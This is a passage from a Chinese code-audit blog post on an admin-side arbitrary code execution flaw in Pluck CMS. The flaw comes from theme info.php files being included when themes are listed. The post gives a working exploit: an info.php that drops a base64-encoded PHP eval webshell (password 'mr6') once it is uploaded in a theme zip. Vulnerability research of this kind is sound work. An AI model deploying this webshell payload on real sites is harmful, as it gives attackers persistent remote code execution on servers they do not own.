<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414611-9cb08d85-6d75-4c58-b89c-e842984cbac1.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414611-9cb08d85-6d75-4c58-b89c-e842984cbac1.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414611-9cb08d85-6d75-4c58-b89c-e842984cbac1.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414611-9cb08d85-6d75-4c58-b89c-e842984cbac1.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414611-9cb08d85-6d75-4c58-b89c-e842984cbac1.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414611-9cb08d85-6d75-4c58-b89c-e842984cbac1.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<p>发现确实上传并且解压成功</p>
<p>但是由于目录下有<code>.htaccess</code>文件，直接把php设置为不可解析，所以无法直接访问</p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414705-e816307a-f173-4b0b-ad2e-7a4ce6c60aa7.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414705-e816307a-f173-4b0b-ad2e-7a4ce6c60aa7.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414705-e816307a-f173-4b0b-ad2e-7a4ce6c60aa7.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414705-e816307a-f173-4b0b-ad2e-7a4ce6c60aa7.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414705-e816307a-f173-4b0b-ad2e-7a4ce6c60aa7.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414705-e816307a-f173-4b0b-ad2e-7a4ce6c60aa7.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414804-4eef60e4-823c-46c7-bd09-8d077a272464.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414804-4eef60e4-823c-46c7-bd09-8d077a272464.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414804-4eef60e4-823c-46c7-bd09-8d077a272464.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414804-4eef60e4-823c-46c7-bd09-8d077a272464.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414804-4eef60e4-823c-46c7-bd09-8d077a272464.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414804-4eef60e4-823c-46c7-bd09-8d077a272464.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<h4 id="文件包含突破" class="headerLink">
    <a href="#%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e7%aa%81%e7%a0%b4" class="header-mark"></a>2.2.2 文件包含突破</h4><p>所以就想到需要找一个位置对其进行包含，来达到执行的目的。</p>
<p>首先看到<code>admin.php</code>中关于<code>theme</code>的部分</p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414892-54b2c30f-68a3-49f9-8839-01057772b313.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414892-54b2c30f-68a3-49f9-8839-01057772b313.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414892-54b2c30f-68a3-49f9-8839-01057772b313.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414892-54b2c30f-68a3-49f9-8839-01057772b313.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414892-54b2c30f-68a3-49f9-8839-01057772b313.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414892-54b2c30f-68a3-49f9-8839-01057772b313.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<p>跟进 <code>data/inc/theme.php</code>，发现调用了<code>get_themes()</code>方法</p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414978-5c97b98e-4d6d-4c05-843b-db94db1b5d8b.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414978-5c97b98e-4d6d-4c05-843b-db94db1b5d8b.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414978-5c97b98e-4d6d-4c05-843b-db94db1b5d8b.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414978-5c97b98e-4d6d-4c05-843b-db94db1b5d8b.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414978-5c97b98e-4d6d-4c05-843b-db94db1b5d8b.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414978-5c97b98e-4d6d-4c05-843b-db94db1b5d8b.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<p>跟进 <code>functions.all.php</code>，查看<code>get_themes()</code>方法</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">function get_themes() {
</span></span><span class="line"><span class="cl">	$dirs = read_dir_contents(&#39;data/themes&#39;, &#39;dirs&#39;);
</span></span><span class="line"><span class="cl">	if ($dirs) {
</span></span><span class="line"><span class="cl">		natcasesort($dirs);
</span></span><span class="line"><span class="cl">		foreach ($dirs as $dir) {
</span></span><span class="line"><span class="cl">			if (file_exists(&#39;data/themes/&#39;.$dir.&#39;/info.php&#39;)) {
</span></span><span class="line"><span class="cl">				include_once (&#39;data/themes/&#39;.$dir.&#39;/info.php&#39;);
</span></span><span class="line"><span class="cl">				$themes[] = array(
</span></span><span class="line"><span class="cl">					&#39;title&#39;   =&gt; $themename,
</span></span><span class="line"><span class="cl">					&#39;dir&#39; =&gt; $dir
</span></span><span class="line"><span class="cl">				);
</span></span><span class="line"><span class="cl">			}
</span></span><span class="line"><span class="cl">		}
</span></span><span class="line"><span class="cl">		return $themes;
</span></span><span class="line"><span class="cl">	}
</span></span><span class="line"><span class="cl">	else
</span></span><span class="line"><span class="cl">		return false;
</span></span><span class="line"><span class="cl">}
</span></span></code></pre></td></tr></table>
</div>
</div><p>发现会遍历<code>data/themes/</code>下所有主题目录，并且包含他的<code>info.php</code>文件</p>
<p>此时<code>info.php</code>可控，就导致了任意代码执行。</p>
<h4 id="利用方法" class="headerLink">
    <a href="#%e5%88%a9%e7%94%a8%e6%96%b9%e6%b3%95" class="header-mark"></a>2.2.3 利用方法</h4><p>首先准备一个<code>info.php</code></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&lt;?php
</span></span><span class="line"><span class="cl">file_put_contents(&#39;x.php&#39;,base64_decode(&#39;PD9waHAgQGV2YWwoJF9HRVRbJ21yNiddKTs/Pg==&#39;));
</span></span><span class="line"><span class="cl">?&gt;
</span></span></code></pre></td></tr></table>
</div>
</div><p>然后打包压缩成<code>shell.zip</code></p>
<p>上传安装主题，然后点击回到主题页，此时触发文件包含。</p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415074-9446a557-1805-4658-97b9-ff4f79cdc0fd.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415074-9446a557-1805-4658-97b9-ff4f79cdc0fd.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415074-9446a557-1805-4658-97b9-ff4f79cdc0fd.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415074-9446a557-1805-4658-97b9-ff4f79cdc0fd.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415074-9446a557-1805-4658-97b9-ff4f79cdc0fd.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415074-9446a557-1805-4658-97b9-ff4f79cdc0fd.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<p>然后根目录下就会生成我们的一句话x.php，密码是mr6</p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415156-8a08993d-6b4f-44c1-bbf4-54c85d5b6927.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415156-8a08993d-6b4f-44c1-bbf4-54c85d5b6927.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415156-8a08993d-6b4f-44c1-bbf4-54c85d5b6927.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415156-8a08993d-6b4f-44c1-bbf4-54c85d5b6927.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415156-8a08993d-6b4f-44c1-bbf4-54c85d5b6927.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415156-8a08993d-6b4f-44c1-bbf4-54c85d5b6927.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415236-098a16ae-69aa-4012-8849-f0dace1f728c.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415236-098a16ae-69aa-4012-8849-f0dace1f728c.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415236-098a16ae-69aa-4012-8849-f0dace1f728c.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415236-098a16ae-69aa-4012-8849-f0dace1f728c.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415236-098a16ae-69aa-4012-8849-f0dace1f728c.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900415236-098a16ae-69aa-4012-8849-f0dace1f728c.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<h2 id="最后" class="headerLink">
    <a href="#%e6%9c%80%e5%90%8e" class="header-mark"></a>3 最后</h2><p><strong>本人水平有限，文笔较差，如果有什么写的不对的地方还希望大家能够不吝赐教</strong></p>
</div>

        

<div class="sponsor">
        <div class="sponsor-avatar"><img
        
        loading="lazy"
        src="/images/avatar.webp"
        srcset="/images/avatar.webp, /images/avatar.webp 1.5x, /images/avatar.webp 2x"
        sizes="100px"
        alt="/images/avatar.webp"
        title="/images/avatar.webp" height="640"   width="640" ></div><p class="sponsor-bio"><em>欢迎加入我的知识星球，共同交流网络安全技术~</em></p><div class="sponsor-custom"><a href="https://t.zsxq.com/FA6urjI" target="_blank"><img src="/zsxq.png" alt="网络安全回收站" style="width:50%;display:inline-block;" ></a></div></div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>更新于 2019-10-26</span>
            </div>
            <div class="post-info-license"></div>
        </div>
        <div class="post-info-line">
            <div class="post-info-md"></div>
            <div class="post-info-share"><button title="分享到 Twitter" data-sharer="twitter" data-url="https://yzddmr6.com/posts/pluck-cms-getshell/" data-title="Pluck CMS后台另两处任意代码执行" data-hashtags="代码审计"><span class="fab fa-twitter fa-fw"></span></button><button title="分享到 Facebook" data-sharer="facebook" data-url="https://yzddmr6.com/posts/pluck-cms-getshell/" data-hashtag="代码审计"><span class="fab fa-facebook-square fa-fw"></span></button><button title="分享到 Hacker News" data-sharer="hackernews" data-url="https://yzddmr6.com/posts/pluck-cms-getshell/" data-title="Pluck CMS后台另两处任意代码执行"><span class="fab fa-hacker-news fa-fw"></span></button><button title="分享到 Line" data-sharer="line" data-url="https://yzddmr6.com/posts/pluck-cms-getshell/" data-title="Pluck CMS后台另两处任意代码执行"><span data-svg-src="/lib/simple-icons/icons/line.min.svg"></span></button><button title="分享到 微博" data-sharer="weibo" data-url="https://yzddmr6.com/posts/pluck-cms-getshell/" data-title="Pluck CMS后台另两处任意代码执行"><span class="fab fa-weibo fa-fw"></span></button><button title="分享到 Telegram" data-sharer="telegram" data-url="https://yzddmr6.com/posts/pluck-cms-getshell/" data-title="Pluck CMS后台另两处任意代码执行" data-web><span class="fab fa-telegram-plane fa-fw"></span></button><script>
        function shareOnMastodon(title, link) {
            const SHARE_MASTODON_DOMAIN = "share_mastodon_domain"
            const savedDomain = localStorage.getItem(SHARE_MASTODON_DOMAIN) ?? "mastodon.social";
            const domain = prompt("Enter your Mastodon domain", savedDomain);
            if (domain === null) {
                return;
            }
            localStorage.setItem(SHARE_MASTODON_DOMAIN, domain)
            const text = title + "\n\n" + link;
            const url = new URL("https://" + domain)
            url.pathname = "share"
            url.searchParams.append('text', text)
            window.open(url, '_blank', "width=500,height=500,left=500,toolbar=0,status=0");
        }
    </script>
    <button title="分享到 Mastodon"onclick="javascript:shareOnMastodon(&#34;Pluck CMS后台另两处任意代码执行&#34;, &#34;https://yzddmr6.com/posts/pluck-cms-getshell/&#34;)"><span class="fab fa-mastodon fa-fw"></span></button></div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"><i class="fas fa-tags fa-fw"></i>&nbsp;<a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">返回</a></span>&nbsp;|&nbsp;<span><a href="/">主页</a></span>
        </section>
    </div>

    <div class="post-nav"><a href="/posts/antsword-xor-encoder/" class="prev" rel="prev" title="蚁剑实现动态秘钥编码器解码器"><i class="fas fa-angle-left fa-fw"></i>蚁剑实现动态秘钥编码器解码器</a>
            <a href="/posts/ant-mass-bypass/" class="next" rel="next" title="蚁剑编码器之流量混淆">蚁剑编码器之流量混淆<i class="fas fa-angle-right fa-fw"></i></a></div>
</div>
<div id="comments"></div></article></div>
        </main><footer class="footer">
        <div class="footer-container"><div class="footer-line"><i class="far fa-copyright fa-fw"></i><span itemprop="copyrightYear">2019 - 2025</span><span class="author" itemprop="copyrightHolder">&nbsp;<a href="https://github.com/yzddmr6" target="_blank" rel="noopener noreferrer">yzddMr6</a></span>&nbsp;|&nbsp;<span class="license"><a rel="license external nofollow noopener noreffer" href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank">CC BY-NC 4.0</a></span></div>
            <div class="footer-line"></div>
            <div class="footer-line">
            </div>
        </div></footer></div>

    <div id="fixed-buttons"><a href="#back-to-top" id="back-to-top-button" class="fixed-button" title="回到顶部">
            <i class="fas fa-arrow-up fa-fw"></i>
        </a><a href="#" id="view-comments" class="fixed-button" title="查看评论">
            <i class="fas fa-comment fa-fw"></i>
        </a>
    </div><div class="assets"><script type="text/javascript">window.config={"code":{"copyTitle":"复制到剪贴板","maxShownLines":10},"comment":{},"search":{"algoliaAppID":"5YGRNRQK1G","algoliaIndex":"zh_cn_index","algoliaSearchKey":"0ff6874805de24b84aa1d5ebccad56cd","highlightTag":"em","maxResultLength":10,"noResultsFound":"没有找到结果","snippetLength":50,"type":"algolia"},"sharerjs":true,"table":{"sort":true}};</script><script type="text/javascript" src="/lib/tablesort/tablesort.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript" src="/js/theme.min.js" defer></script></div>
</body>

</html>